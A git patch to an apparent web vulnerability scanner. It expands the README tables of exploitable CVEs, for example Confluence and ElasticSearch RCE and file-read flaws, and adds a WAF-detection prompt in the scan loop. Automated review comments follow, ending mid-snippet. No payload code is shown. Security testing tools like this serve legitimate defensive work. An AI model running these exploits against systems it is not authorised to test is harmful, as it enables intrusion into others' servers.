From ba309df74b5ac935b0bea2115ececfb20dd489c4 Mon Sep 17 00:00:00 2001 From: CLincat <3132002932@qq.com> Date: Thu, 16 Jun 2022 14:34:46 +0800 Subject: [PATCH] 20220616-v1.0.9 --- README.md | 155 +++++++------ README_en-us.md | 156 +++++++------ lib/core/coreScan.py | 62 ++++- lib/initial/config.py | 2 +- lib/initial/language.py | 38 +++- lib/initial/list.py | 163 +++++++++----- lib/initial/parse.py | 8 +- lib/tool/check.py | 2 +- lib/tool/fingerprint.py | 182 ++++++++++++++- lib/tool/head.py | 16 ++ lib/tool/logger.py | 1 + payloads/AtlassianConfluence.py | 386 ++++++++++++++++++++++++++++++++ payloads/Django.py | 3 +- payloads/ElasticSearch.py | 369 ++++++++++++++++++++++++++++++ payloads/F5BIGIP.py | 13 +- payloads/Fastjson.py | 2 +- payloads/Spring.py | 12 +- payloads/ThinkPHP.py | 91 +++++++- payloads/demo2.py | 134 +++++++++++ 19 files changed, 1572 insertions(+), 223 deletions(-) create mode 100644 lib/tool/head.py create mode 100644 payloads/AtlassianConfluence.py create mode 100644 payloads/ElasticSearch.py create mode 100644 payloads/demo2.py diff --git a/README.md b/README.md index 2b7948f..6413e71 100644 --- a/README.md +++ b/README.md @@ -6,76 +6,87 @@ * 如果有什么想法、建议或者遇到了BUG, 都可以issues **目前支持扫描的web应用程序有:** -> AlibabaDruid, AlibabaNacos, ApacheAirflow, ApacheAPISIX, ApacheFlink, ApacheSolr, ApacheStruts2, ApacheTomcat, AppWeb, Cicso, Django, F5-BIG-IP, Fastjson, Keycloak, Spring, ThinkPHP, Ueditor, Weblogic, Yonyou +> AlibabaDruid, AlibabaNacos, ApacheAirflow, ApacheAPISIX, ApacheFlink, ApacheSolr, ApacheStruts2, ApacheTomcat, AppWeb, AtlassianConfluence, Cicso, Django, ElasticSearch, F5-BIG-IP, Fastjson, Keycloak, Spring, ThinkPHP, Ueditor, Weblogic, Yonyou
目前支持扫描的web漏洞有: [点击展开] ``` -+---------------+------------------+------------+----------+------------------------------------------------------------+ -| Target | Vul_id | Type | Method | Description | -+---------------+------------------+------------+----------+------------------------------------------------------------+ -| AlibabaDruid | None | unAuth | GET | 阿里巴巴Druid未授权访问 | -+---------------+------------------+------------+----------+------------------------------------------------------------+ -| AlibabaNacos | CVE-2021-29441 | unAuth | GET/POST | 阿里巴巴Nacos未授权访问 | -+---------------+------------------+------------+----------+------------------------------------------------------------+ -| ApacheAirflow | CVE-2020-17526 | unAuth | GET | Airflow身份验证绕过 | -+---------------+------------------+------------+----------+------------------------------------------------------------+ -| ApacheAPISIX | CVE-2020-13945 | unAuth | GET | Apache APISIX默认密钥 | -+---------------+------------------+------------+----------+------------------------------------------------------------+ -| ApacheFlink | CVE-2020-17519 | FileRead | GET | Flink目录遍历 | -+---------------+------------------+------------+----------+------------------------------------------------------------+ -| ApacheSolr | CVE-2021-27905 | SSRF | GET/POST | Solr SSRF/任意文件读取 | -+---------------+------------------+------------+----------+------------------------------------------------------------+ -| ApacheStruts2 | S2-001 | RCE | POST | Struts2远程代码执行 | -| ApacheStruts2 | S2-005 | RCE | GET | Struts2远程代码执行 | -| ApacheStruts2 | S2-007 | RCE | GET | Struts2远程代码执行 | -| ApacheStruts2 | S2-008 | RCE | GET | Struts2远程代码执行 | -| ApacheStruts2 | S2-009 | RCE | GET | Struts2远程代码执行 | -| ApacheStruts2 | S2-012 | RCE | GET | Struts2远程代码执行 | -+---------------+------------------+------------+----------+------------------------------------------------------------+ -| ApacheTomcat | CVE-2017-12615 | FileUpload | PUT | PUT方法任意文件写入 | 
-+---------------+------------------+------------+----------+------------------------------------------------------------+ -| AppWeb | CVE-2018-8715 | unAuth | GET | AppWeb身份认证绕过 | -+---------------+------------------+------------+----------+------------------------------------------------------------+ -| Cisco | CVE-2020-3580 | XSS | POST | 思科ASA/FTD XSS跨站脚本攻击 | -+---------------+------------------+------------+----------+------------------------------------------------------------+ -| Django | CVE-2017-12794 | XSS | GET | Django debug page XSS跨站脚本攻击 | -| Django | CVE-2019-14234 | SQLinject | GET | Django JSONfield SQL注入 | -| Django | CVE-2018-14574 | Redirect | GET | CommonMiddleware url重定向 | -| Django | CVE-2020-9402 | SQLinject | GET | GIS SQL注入 | -| Django | CVE-2021-35042 | SQLinject | GET | QuerySet.order_by SQL注入 | -+---------------+------------------+------------+----------+------------------------------------------------------------+ -| F5-BIG-IP | CVE-2020-5902 | RCE | GET | BIG-IP远程代码执行 | -| F5-BIG-IP | CVE-2022-1388 | unAuth | POST | BIG-IP身份认证绕过 | -+---------------+------------------+------------+----------+------------------------------------------------------------+ -| Fastjson | CNVD-2019-22238 | unSerialize| POST | Fastjson <=1.2.47 反序列化 | -| Fastjson | CVE-2017-18349 | unSerialize| POST | Fastjson <= 1.2.24 反序列化 | -+---------------+------------------+------------+----------+------------------------------------------------------------+ -| Keycloak | CVE-2020-10770 | SSRF | GET | 使用request_uri调用未经验证的URL | -+---------------+------------------+------------+----------+------------------------------------------------------------+ -| Spring | CVE-2022-22965 | RCE | GET/POST | Spring Framework远程代码执行 | -| Spring | CVE-2021-21234 | FileRead | GET | Spring Boot目录遍历 | -| Spring | CVE-2020-5410 | FileRead | GET | Spring Cloud目录遍历 | -| Spring | CVE-2022-22963 | RCE | POST | Spring Cloud Function SpEL远程代码执行 | -| Spring | CVE-2022-22947 | RCE | POST | Spring 
Cloud Gateway SpEl远程代码执行 | -+---------------+------------------+------------+----------+------------------------------------------------------------+ -| ThinkPHP | CNVD-2018-24942 | RCE | GET | 未开启强制路由导致RCE | -| ThinkPHP | CNNVD-201901-445 | RCE | POST | 核心类Request远程代码执行 | -| ThinkPHP | None | RCE | GET | ThinkPHP2.x 远程代码执行 | -| ThinkPHP | None | SQLinject | GET | ThinkPHP5 ids参数SQL注入 | -+---------------+------------------+------------+----------+------------------------------------------------------------+ -| Ueditor | None | SSRF | GET | Ueditor编辑器SSRF | -+---------------+------------------+------------+----------+------------------------------------------------------------+ -| Weblogic | CVE-2020-14882 | RCE | GET | Weblogic未授权命令执行 | -| Weblogic | CVE-2020-14750 | unAuth | GET | Weblogic权限验证绕过 | -| Weblogic | CVE-2019-2725 | unSerialize| POST | Weblogic wls9_async反序列化 | -| Weblogic | CVE-2017-10271 | unSerialize| POST | Weblogic XMLDecoder反序列化 | -| Weblogic | CVE-2014-4210 | SSRF | GET | Weblogic 服务端请求伪造 | -+---------------+------------------+------------+----------+------------------------------------------------------------+ -| Yonyou | CNVD-2021-30167 | RCE | GET | 用友NC BeanShell远程命令执行 | -| Yonyou | None | FileRead | GET | 用友ERP-NC NCFindWeb目录遍历 | -+---------------+------------------+------------+----------+------------------------------------------------------------+ ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| Target | Vul_id | Type | Method | Description | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| Alibaba Druid | None | unAuth | GET | 阿里巴巴Druid未授权访问 | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| Alibaba Nacos | CVE-2021-29441 | unAuth | GET/POST | 阿里巴巴Nacos未授权访问 | 
++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| Apache Airflow | CVE-2020-17526 | unAuth | GET | Airflow身份验证绕过 | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| Apache APISIX | CVE-2020-13945 | unAuth | GET | Apache APISIX默认密钥 | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| Apache Flink | CVE-2020-17519 | FileRead | GET | Flink目录遍历 | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| Apache Solr | CVE-2021-27905 | SSRF | GET/POST | Solr SSRF/任意文件读取 | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| Apache Struts2 | S2-001 | RCE | POST | Struts2远程代码执行 | +| Apache Struts2 | S2-005 | RCE | GET | Struts2远程代码执行 | +| Apache Struts2 | S2-007 | RCE | GET | Struts2远程代码执行 | +| Apache Struts2 | S2-008 | RCE | GET | Struts2远程代码执行 | +| Apache Struts2 | S2-009 | RCE | GET | Struts2远程代码执行 | +| Apache Struts2 | S2-012 | RCE | GET | Struts2远程代码执行 | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| Apache Tomcat | CVE-2017-12615 | FileUpload | PUT | PUT方法任意文件写入 | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| AppWeb | CVE-2018-8715 | unAuth | GET | AppWeb身份认证绕过 | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| Atlassian Confluence | CVE-2015-8399 | FileRead | GET | Confluence任意文件包含 | +| Atlassian Confluence | CVE-2019-3396 | RCE/FileRead | POST | Confluence路径遍历和命令执行 | +| Atlassian Confluence | 
CVE-2021-26084 | RCE | POST | Confluence Webwork Pre-Auth OGNL表达式命令注入 | +| Atlassian Confluence | CVE-2022-26134 | RCE | GET | Confluence远程代码执行 | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| Cisco | CVE-2020-3580 | XSS | POST | 思科ASA/FTD XSS跨站脚本攻击 | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| Django | CVE-2017-12794 | XSS | GET | Django debug page XSS跨站脚本攻击 | +| Django | CVE-2018-14574 | Redirect | GET | CommonMiddleware url重定向 | +| Django | CVE-2019-14234 | SQLinject | GET | Django JSONfield SQL注入 | +| Django | CVE-2020-9402 | SQLinject | GET | GIS SQL注入 | +| Django | CVE-2021-35042 | SQLinject | GET | QuerySet.order_by SQL注入 | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| ElasticSearch | CVE-2014-3120 | RCE | POST | ElasticSearch命令执行 | +| ElasticSearch | CVE-2015-1427 | RCE | POST | ElasticSearch Groovy 沙盒绕过&&代码执行 | +| ElasticSearch | CVE-2015-3337 | FileRead | GET | ElasticSearch 目录穿越 | +| ElasticSearch | CVE-2015-5531 | FileRead | PUT/GET | ElasticSearch 目录穿越 | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| F5 BIG-IP | CVE-2020-5902 | RCE | GET | BIG-IP远程代码执行 | +| F5 BIG-IP | CVE-2022-1388 | unAuth | POST | BIG-IP身份认证绕过 | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| Fastjson | CNVD-2017-02833 | unSerialize | POST | Fastjson <= 1.2.24 反序列化 | +| Fastjson | CNVD-2019-22238 | unSerialize | POST | Fastjson <=1.2.47 反序列化 | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| Keycloak | CVE-2020-10770 | SSRF | GET | 使用request_uri调用未经验证的URL | 
++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| Spring | CVE-2020-5410 | FileRead | GET | Spring Cloud目录遍历 | +| Spring | CVE-2021-21234 | FileRead | GET | Spring Boot目录遍历 | +| Spring | CVE-2022-22947 | RCE | POST | Spring Cloud Gateway SpEl远程代码执行 | +| Spring | CVE-2022-22963 | RCE | POST | Spring Cloud Function SpEL远程代码执行 | +| Spring | CVE-2022-22965 | RCE | GET/POST | Spring Framework远程代码执行 | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| ThinkPHP | CVE-2018-1002015 | RCE | GET | ThinkPHP5.x 远程代码执行 | +| ThinkPHP | CNVD-2018-24942 | RCE | GET | 未开启强制路由导致RCE | +| ThinkPHP | CNNVD-201901-445 | RCE | POST | 核心类Request远程代码执行 | +| ThinkPHP | None | RCE | GET | ThinkPHP2.x 远程代码执行 | +| ThinkPHP | None | SQLinject | GET | ThinkPHP5 ids参数SQL注入 | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| Ueditor | None | SSRF | GET | Ueditor编辑器SSRF | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| Oracle Weblogic | CVE-2014-4210 | SSRF | GET | Weblogic 服务端请求伪造 | +| Oracle Weblogic | CVE-2017-10271 | unSerialize | POST | Weblogic XMLDecoder反序列化 | +| Oracle Weblogic | CVE-2019-2725 | unSerialize | POST | Weblogic wls9_async反序列化 | +| Oracle Weblogic | CVE-2020-14750 | unAuth | GET | Weblogic权限验证绕过 | +| Oracle Weblogic | CVE-2020-14882 | RCE | GET | Weblogic未授权命令执行 | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| Yonyou | CNVD-2021-30167 | RCE | GET | 用友NC BeanShell远程命令执行 | +| Yonyou | None | FileRead | GET | 用友ERP-NC NCFindWeb目录遍历 | 
++----------------------+------------------+--------------+----------+------------------------------------------------------------+ ```
@@ -133,7 +144,7 @@ Options: http/https代理 (如: --http-proxy 127.0.0.1:8080) --user-agent=UA 自定义User-Agent --cookie=COOKIE 添加cookie - --log=LOG 日志等级, 可选1-5 (默认: 1) [日志2级: 框架名称+漏洞编号+状态码] [日志3级: + --log=LOG 日志等级, 可选1-6 (默认: 1) [日志2级: 框架名称+漏洞编号+状态码] [日志3级: 2级内容+请求方法+请求目标+POST数据] [日志4级: 2级内容+请求数据包] [日志5级: 4级内容+响应头] [日志6级: 5级内容+响应内容] @@ -160,15 +171,21 @@ Options: 以json格式保存扫描结果, 无漏洞时不会生成文件(如: --output-text result.json) + General: + 通用工作参数 + + --no-waf 禁用waf检测 + --batch yes/no的选项不需要用户输入, 使用默认选项 + Lists: 漏洞列表 --list 查看所有Payload 支持的目标类型(-a参数, 不区分大小写): - AliDruid,airflow,apisix,appweb,cisco,django,f5bigip,fastjson,flink,key - cloak,nacos,thinkphp,tomcat,spring,solr,struts2,ueditor,weblogic,yonyo - u + AliDruid,airflow,apisix,appweb,cisco,confluence,django,elasticsearch,f + 5bigip,fastjson,flink,keycloak,nacos,thinkphp,tomcat,spring,solr,strut + s2,ueditor,weblogic,yonyou ``` ## language diff --git a/README_en-us.md b/README_en-us.md index 8889c56..52c2edc 100644 --- a/README_en-us.md +++ b/README_en-us.md @@ -5,76 +5,87 @@ * If you have any ideas, suggestions, or bugs, you can issue **Web applications that currently support scanning:** -> AlibabaDruid, AlibabaNacos, ApacheAirflow, ApacheAPISIX, ApacheFlink, ApacheSolr, ApacheStruts2, ApacheTomcat, AppWeb, Cicso, Django, F5-BIG-IP, Fastjson, Keycloak, Spring, ThinkPHP, Ueditor, Weblogic, Yonyou +> AlibabaDruid, AlibabaNacos, ApacheAirflow, ApacheAPISIX, ApacheFlink, ApacheSolr, ApacheStruts2, ApacheTomcat, AppWeb, AtlassianConfluence, Cicso, Django, ElasticSearch, F5-BIG-IP, Fastjson, Keycloak, Spring, ThinkPHP, Ueditor, Weblogic, Yonyou
The current web vulnerabilities that support scanning: [Click on] ``` -+---------------+------------------+------------+----------+------------------------------------------------------------+ -| Target | Vul_id | Type | Method | Description | -+---------------+------------------+------------+----------+------------------------------------------------------------+ -| AlibabaDruid | None | unAuth | GET | Alibaba Druid unAuthorized | -+---------------+------------------+------------+----------+------------------------------------------------------------+ -| AlibabaNacos | CVE-2021-29441 | unAuth | GET/POST | Alibaba Nacos unAuthorized | -+---------------+------------------+------------+----------+------------------------------------------------------------+ -| ApacheAirflow | CVE-2020-17526 | unAuth | GET | Airflow Authentication bypass | -+---------------+------------------+------------+----------+------------------------------------------------------------+ -| ApacheAPISIX | CVE-2020-13945 | unAuth | GET | Apache APISIX default access token | -+---------------+------------------+------------+----------+------------------------------------------------------------+ -| ApacheFlink | CVE-2020-17519 | FileRead | GET | Flink Directory traversal | -+---------------+------------------+------------+----------+------------------------------------------------------------+ -| ApacheSolr | CVE-2021-27905 | SSRF | GET/POST | Solr SSRF/FileRead | -+---------------+------------------+------------+----------+------------------------------------------------------------+ -| ApacheStruts2 | S2-001 | RCE | POST | Struts2 Remote code execution | -| ApacheStruts2 | S2-005 | RCE | GET | Struts2 Remote code execution | -| ApacheStruts2 | S2-007 | RCE | GET | Struts2 Remote code execution | -| ApacheStruts2 | S2-008 | RCE | GET | Struts2 Remote code execution | -| ApacheStruts2 | S2-009 | RCE | GET | Struts2 Remote code execution | -| ApacheStruts2 | S2-012 | RCE | GET | Struts2 Remote code 
execution | -+---------------+------------------+------------+----------+------------------------------------------------------------+ -| ApacheTomcat | CVE-2017-12615 | FileUpload | PUT | Put method writes to any file | -+---------------+------------------+------------+----------+------------------------------------------------------------+ -| AppWeb | CVE-2018-8715 | unAuth | GET | AppWeb Authentication bypass | -+---------------+------------------+------------+----------+------------------------------------------------------------+ -| Cisco | CVE-2020-3580 | XSS | POST | Cisco ASA/FTD XSS | -+---------------+------------------+------------+----------+------------------------------------------------------------+ -| Django | CVE-2017-12794 | XSS | GET | Django debug page XSS | -| Django | CVE-2019-14234 | SQLinject | GET | Django JSONfield SQLinject | -| Django | CVE-2018-14574 | Redirect | GET | Django CommonMiddleware URL Redirect | -| Django | CVE-2020-9402 | SQLinject | GET | Django GIS SQLinject | -| Django | CVE-2021-35042 | SQLinject | GET | Django QuerySet.order_by SQLinject | -+---------------+------------------+------------+----------+------------------------------------------------------------+ -| F5-BIG-IP | CVE-2020-5902 | RCE | GET | BIG-IP Remote code execution | -| F5-BIG-IP | CVE-2022-1388 | unAuth | POST | BIG-IP Authentication bypass | -+---------------+------------------+------------+----------+------------------------------------------------------------+ -| Fastjson | CNVD-2019-22238 | unSerialize| POST | Fastjson <=1.2.47 deSerialization | -| Fastjson | CVE-2017-18349 | unSerialize| POST | Fastjson <= 1.2.24 deSerialization | -+---------------+------------------+------------+----------+------------------------------------------------------------+ -| Keycloak | CVE-2020-10770 | SSRF | GET | request_uri SSRF | -+---------------+------------------+------------+----------+------------------------------------------------------------+ -| Spring | 
CVE-2022-22965 | RCE | GET/POST | Spring Framework Remote code execution | -| Spring | CVE-2021-21234 | FileRead | GET | Spring Boot Directory traversal | -| Spring | CVE-2020-5410 | FileRead | GET | Spring Cloud Directory traversal | -| Spring | CVE-2022-22963 | RCE | POST | Spring Cloud Function SpEL Remote code execution | -| Spring | CVE-2022-22947 | RCE | POST | Spring Cloud Gateway SpEl Remote code execution | -+---------------+------------------+------------+----------+------------------------------------------------------------+ -| ThinkPHP | CNVD-2018-24942 | RCE | GET | The forced route is not enabled Remote code execution | -| ThinkPHP | CNNVD-201901-445 | RCE | POST | Core class Request Remote code execution | -| ThinkPHP | None | RCE | GET | ThinkPHP2.x Remote code execution | -| ThinkPHP | None | SQLinject | GET | ThinkPHP5 ids SQLinject | -+---------------+------------------+------------+----------+------------------------------------------------------------+ -| Ueditor | None | SSRF | GET | Ueditor SSRF | -+---------------+------------------+------------+----------+------------------------------------------------------------+ -| Weblogic | CVE-2020-14882 | RCE | GET | Weblogic Unauthorized command execution | -| Weblogic | CVE-2020-14750 | unAuth | GET | Weblogic Authentication bypass | -| Weblogic | CVE-2019-2725 | unSerialize| POST | Weblogic wls9_async deSerialization | -| Weblogic | CVE-2017-10271 | unSerialize| POST | Weblogic XMLDecoder deSerialization | -| Weblogic | CVE-2014-4210 | SSRF | GET | Weblogic SSRF | -+---------------+------------------+------------+----------+------------------------------------------------------------+ -| Yonyou | CNVD-2021-30167 | RCE | GET | Yonyou-NC BeanShell Remote code execution | -| Yonyou | None | FileRead | GET | Yonyou-ERP-NC NCFindWeb Directory traversal | -+---------------+------------------+------------+----------+------------------------------------------------------------+ 
++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| Target | Vul_id | Type | Method | Description | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| Alibaba Druid | None | unAuth | GET | Alibaba Druid unAuthorized | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| Alibaba Nacos | CVE-2021-29441 | unAuth | GET/POST | Alibaba Nacos unAuthorized | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| Apache Airflow | CVE-2020-17526 | unAuth | GET | Airflow Authentication bypass | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| Apache APISIX | CVE-2020-13945 | unAuth | GET | Apache APISIX default access token | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| Apache Flink | CVE-2020-17519 | FileRead | GET | Flink Directory traversal | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| Apache Solr | CVE-2021-27905 | SSRF | GET/POST | Solr SSRF/FileRead | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| Apache Struts2 | S2-001 | RCE | POST | Struts2 Remote code execution | +| Apache Struts2 | S2-005 | RCE | GET | Struts2 Remote code execution | +| Apache Struts2 | S2-007 | RCE | GET | Struts2 Remote code execution | +| Apache Struts2 | S2-008 | RCE | GET | Struts2 Remote code execution | +| Apache Struts2 | S2-009 | RCE | GET | Struts2 Remote code execution | +| Apache Struts2 | S2-012 | RCE | GET | 
Struts2 Remote code execution | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| Apache Tomcat | CVE-2017-12615 | FileUpload | PUT | Put method writes to any file | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| AppWeb | CVE-2018-8715 | unAuth | GET | AppWeb Authentication bypass | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| Atlassian Confluence | CVE-2015-8399 | FileRead | GET | Confluence any file include | +| Atlassian Confluence | CVE-2019-3396 | RCE/FileRead | POST | Confluence Directory traversal && RCE | +| Atlassian Confluence | CVE-2021-26084 | RCE | POST | Confluence OGNL expression command injection | +| Atlassian Confluence | CVE-2022-26134 | RCE | GET | Confluence Remote code execution | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| Cisco | CVE-2020-3580 | XSS | POST | Cisco ASA/FTD XSS | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| Django | CVE-2017-12794 | XSS | GET | Django debug page XSS | +| Django | CVE-2018-14574 | Redirect | GET | Django CommonMiddleware URL Redirect | +| Django | CVE-2019-14234 | SQLinject | GET | Django JSONfield SQLinject | +| Django | CVE-2020-9402 | SQLinject | GET | Django GIS SQLinject | +| Django | CVE-2021-35042 | SQLinject | GET | Django QuerySet.order_by SQLinject | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| ElasticSearch | CVE-2014-3120 | RCE | POST | ElasticSearch Remote code execution | +| ElasticSearch | CVE-2015-1427 | RCE | POST | ElasticSearch Groovy Sandbox to bypass && RCE | +| 
ElasticSearch | CVE-2015-3337 | FileRead | GET | ElasticSearch Directory traversal | +| ElasticSearch | CVE-2015-5531 | FileRead | PUT/GET | ElasticSearch Directory traversal | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| F5 BIG-IP | CVE-2020-5902 | RCE | GET | BIG-IP Remote code execution | +| F5 BIG-IP | CVE-2022-1388 | unAuth | POST | BIG-IP Authentication bypass | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| Fastjson | CNVD-2017-02833 | unSerialize | POST | Fastjson <= 1.2.24 deSerialization | +| Fastjson | CNVD-2019-22238 | unSerialize | POST | Fastjson <=1.2.47 deSerialization | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| Keycloak | CVE-2020-10770 | SSRF | GET | request_uri SSRF | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| Spring | CVE-2020-5410 | FileRead | GET | Spring Cloud Directory traversal | +| Spring | CVE-2021-21234 | FileRead | GET | Spring Boot Directory traversal | +| Spring | CVE-2022-22947 | RCE | POST | Spring Cloud Gateway SpEl Remote code execution | +| Spring | CVE-2022-22963 | RCE | POST | Spring Cloud Function SpEL Remote code execution | +| Spring | CVE-2022-22965 | RCE | GET/POST | Spring Framework Remote code execution | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| ThinkPHP | CVE-2018-1002015 | RCE | GET | ThinkPHP5.x Remote code execution | +| ThinkPHP | CNVD-2018-24942 | RCE | GET | The forced route is not enabled Remote code execution | +| ThinkPHP | CNNVD-201901-445 | RCE | POST | Core class Request Remote code execution | +| ThinkPHP | None | RCE | GET | ThinkPHP2.x Remote code execution 
| +| ThinkPHP | None | SQLinject | GET | ThinkPHP5 ids SQLinject | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| Ueditor | None | SSRF | GET | Ueditor SSRF | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| Oracle Weblogic | CVE-2014-4210 | SSRF | GET | Weblogic SSRF | +| Oracle Weblogic | CVE-2017-10271 | unSerialize | POST | Weblogic XMLDecoder deSerialization | +| Oracle Weblogic | CVE-2019-2725 | unSerialize | POST | Weblogic wls9_async deSerialization | +| Oracle Weblogic | CVE-2020-14750 | unAuth | GET | Weblogic Authentication bypass | +| Oracle Weblogic | CVE-2020-14882 | RCE | GET | Weblogic Unauthorized command execution | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ +| Yonyou | CNVD-2021-30167 | RCE | GET | Yonyou-NC BeanShell Remote code execution | +| Yonyou | None | FileRead | GET | Yonyou-ERP-NC NCFindWeb Directory traversal | ++----------------------+------------------+--------------+----------+------------------------------------------------------------+ ```
@@ -133,7 +144,7 @@ Options: 127.0.0.1:8080) --user-agent=UA Customize the User-Agent --cookie=COOKIE Add a cookie - --log=LOG The log level, Optional 1-5 (default: 1) [level 2: + --log=LOG The log level, Optional 1-6 (default: 1) [level 2: Framework name + Vulnerability number + status code] [level 3: Level 2 content + request method + request target +POST data] [level 4: Level 2 content + request @@ -167,15 +178,22 @@ Options: will not generate files(e.g. --output-text result.json) + General: + General operating parameter + + --no-waf Disable WAF detection + --batch The yes/no option does not require user input. The + default option is used + Lists: Vulnerability list --list View all payload Supported target types(Case insensitive): - AliDruid,airflow,apisix,appweb,cisco,django,f5bigip,fastjson,flink,key - cloak,nacos,thinkphp,tomcat,spring,solr,struts2,ueditor,weblogic,yonyo - u + AliDruid,airflow,apisix,appweb,cisco,confluence,django,elasticsearch,f + 5bigip,fastjson,flink,keycloak,nacos,thinkphp,tomcat,spring,solr,strut + s2,ueditor,weblogic,yonyou ``` ## language diff --git a/lib/core/coreScan.py b/lib/core/coreScan.py index 76909d0..be4f048 100644 --- a/lib/core/coreScan.py +++ b/lib/core/coreScan.py @@ -7,6 +7,7 @@ from lib.tool.logger import logger from lib.tool import check from lib.report import output +from lib.tool.fingerprint import identify from payloads.AlibabaDruid import alidruid from payloads.AlibabaNacos import nacos from payloads.ApacheAirflow import airflow @@ -16,8 +17,10 @@ from payloads.ApacheTomcat import tomcat from payloads.ApacheStruts2 import struts2 from payloads.AppWeb import appweb +from payloads.AtlassianConfluence import confluence from payloads.Cisco import cisco from payloads.Django import django +from payloads.ElasticSearch import elasticsearch from payloads.F5BIGIP import f5bigip from payloads.Fastjson import fastjson from payloads.ThinkPHP import thinkphp 
@@ -38,6 +41,9 @@ def __init__(self):
 self.delay = config.get('delay') # * 延时
 self.url_list = config.get('url_list') # * url列表
 self.app_list = config.get('app_list') # * 框架列表
+ self.batch = config.get('batch')
+ self.no_waf = config.get('no_waf') # * 是否启用WAF指纹识别
+ # self.web_app = config.get('web_app') # * 是否启用框架指纹识别
 self.thread_list = [] # * 已经运行的线程列表
 self.results = [] # * 结果列表
 self.queue = Queue() # * 创建线程池
@@ -48,8 +54,37 @@ def __init__(self):
 def start(self):
 ''' 开始扫描, 添加poc并启动 '''
- for u in self.url_list: # * 遍历urls
- logger.info('yellow_ex', self.lang['core']['start']['start'] + u) # ? 提示, 开始扫描当前url
+ for u in self.url_list: # * 遍历urls
+ logger.info('yellow_ex', self.lang['core']['start']['start'] + u) # ? 提示, 开始扫描当前url
+
+ # * --------------------WAF指纹识别--------------------
+ if (not self.no_waf):
+ waf_info = identify.waf_identify(u) # * WAF指纹识别
+ if waf_info:
+ while True:
+ if (not self.batch): # * 是否使用默认选项
+ logger.info('red', '', print_end='')
+ operation = input(self.lang['core']['start']['waf_find'].format(waf_info)) # * 接收参数
+ else:
+ logger.info('red', self.lang['core']['start']['waf_find'].format(waf_info), print_end='')
+ operation = 'no' # * 默认选项No
+ logger.info('red', 'no', notime=True)
+
+ operation = operation.lower() # * 字母转小写
+ if operation in ['y', 'yes']: # * 继续扫描
+ logger.info('yellow_ex', self.lang['core']['stop']['continue']) # ? 日志, 继续扫描
+ break
+ elif operation in ['n', 'no']:
+ logger.info('yellow_ex', self.lang['core']['stop']['next']) # ? 日志, 下一个
+ u = 'next'
+ break
+ else:
+ logger.info('yellow_ex', self.lang['core']['start']['waf_not_find'])
+
+ if u == 'next':
+ continue
+ # * --------------------WAF指纹识别--------------------
+
 if check.check_connect(u):
 self.addPOC(u) # * 为url添加poc 并加入线程池
 self.scanning() # * 开始扫描该url
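Review bot: The added `# self.web_app = config.get('web_app')` line in `__init__` is commented-out code rather than a comment, so a later reader cannot tell whether framework fingerprinting is planned, temporarily disabled, or abandoned. Either drop the line or replace it with a tracked note such as `# TODO: framework fingerprinting (web_app) is not wired in yet`. `__init__` starts before this hunk.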
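Review bot: The WAF prompt loop reuses the loop variable as a control-flow sentinel (`u = 'next'` … `if u == 'next': continue`) because a `continue` inside the inner `while True` would target the `while`, not the `for`; a dedicated boolean is clearer and cannot be confused with a target URL. Separately, when `--batch` is not set and stdin is not a terminal (piped input, CI), `input()` raises `EOFError`, which nothing in `start` catches, so the whole run dies on the first WAF hit; falling back to the batch default there keeps the scan going. Note also that in batch mode a WAF hit drops the target with only a red log line and no entry in the results, which an automated run will not notice — worth deciding whether skipped targets should be reported. The probe runs before `check.check_connect(u)`, so an unreachable target is hit by `identify.waf_identify` first; whether that helper tolerates connection errors is not visible here, and whether `start` continues past `self.scanning()` is outside this hunk.

```python
            skip_target = False                      # replaces the u = 'next' sentinel
            if not self.no_waf:
                waf_info = identify.waf_identify(u)
                if waf_info:
                    while True:
                        if not self.batch:
                            logger.info('red', '', print_end='')
                            try:
                                operation = input(self.lang['core']['start']['waf_find'].format(waf_info))
                            except EOFError:        # stdin is not interactive: behave like --batch
                                operation = 'no'
                        # … unchanged: batch branch, operation.lower(), 'y'/'yes' handling …
                        elif operation in ['n', 'no']:
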